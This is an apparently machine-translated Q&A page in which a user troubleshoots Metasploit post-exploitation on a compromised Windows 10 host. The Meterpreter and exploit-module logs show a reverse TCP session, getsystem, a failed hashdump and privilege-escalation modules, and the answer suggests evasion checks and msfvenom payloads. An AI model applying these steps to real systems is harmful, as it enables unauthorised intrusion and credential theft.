web-dev-qa-db-ja.com

特権エスカレーションを得たが、Metasploitを使用した権限がない

私は非常に奇妙な問題に直面しています。 Meterpreter_Reverse TCPを備えたShellterを使用してボックスをポップしました。

これがsysinfoです:

meterpreter > sysinfo
Computer        : ********
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x64/windows

今、奇妙なことは私がタイプしたときです:

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

NT Authorityを取得したと表示されていますが、次のように入力すると:

meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
  SeAssignPrimaryTokenPrivilege
  SeChangeNotifyPrivilege
  SeCreateGlobalPrivilege
  SeDebugPrivilege
  SeImpersonatePrivilege
  SeSystemProfilePrivilege
  SeTcbPrivilege

これらは私が得る特権です。すべてではない。 hashdumpを使用しようとすると:

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

また、私はすでに別のNT Authority Process(この場合はsvchost.exe)に移行しています。

バックグラウンドのローカルエクスプロイトを実行しようとすると、システムがすでに昇格していると表示されます。

msf exploit(ms16_032_secondary_logon_handle_privesc) > run

[*] Started reverse TCP handler on 192.168.0.100:4444
[-] Exploit aborted due to failure: none: Session is already elevated

また、「ASK」エクスプロイトを使用して特権を取得しようとすると、次のようになります。

msf exploit(ask) > run

[*] Started reverse TCP handler on 192.168.0.100:4444
[+] UAC is not enabled, no Prompt for the user
[*] Uploading eobKMikmOsnWp.exe - 73802 bytes to the filesystem...
[*] Executing Command!

そして、それはただフリーズし、犠牲者のコンピュータにプロンプ​​トは出されません。

また、実行しようとするコマンドでも、アクセス権がないことを示すエラーが表示されます。

meterpreter > kill 7744
Killing: 7744
[-] stdapi_sys_process_kill: Operation failed: Access is denied.

ここで何が起こっているのか正確に理解できなくなってしまいました。システムにアクセスできたとのことですが、それでも何もできませんか?

どうして?

任意の助けいただければ幸いです。

9
Sankalp Singha

ターゲットはEMETを使用していますか?具体的には、アプリケーションのホワイトリスト登録?また、どんなAV?

また、ハッシュダンプとgetsystemの両方が依存しているセッションを設定しなかったためかもしれません。また、インタラクティブなシェルを取得できない場合もあります!:

https://www.offensive-security.com/metasploit-unleashed/john-ripper/https://www.offensive-security.com/metasploit-unleashed/privilege-escalation /

最後に、代わりにmeterpreter以外のペイロード(msfvenomを介して生成されたものなど)を使用できますか?

1
grepNstepN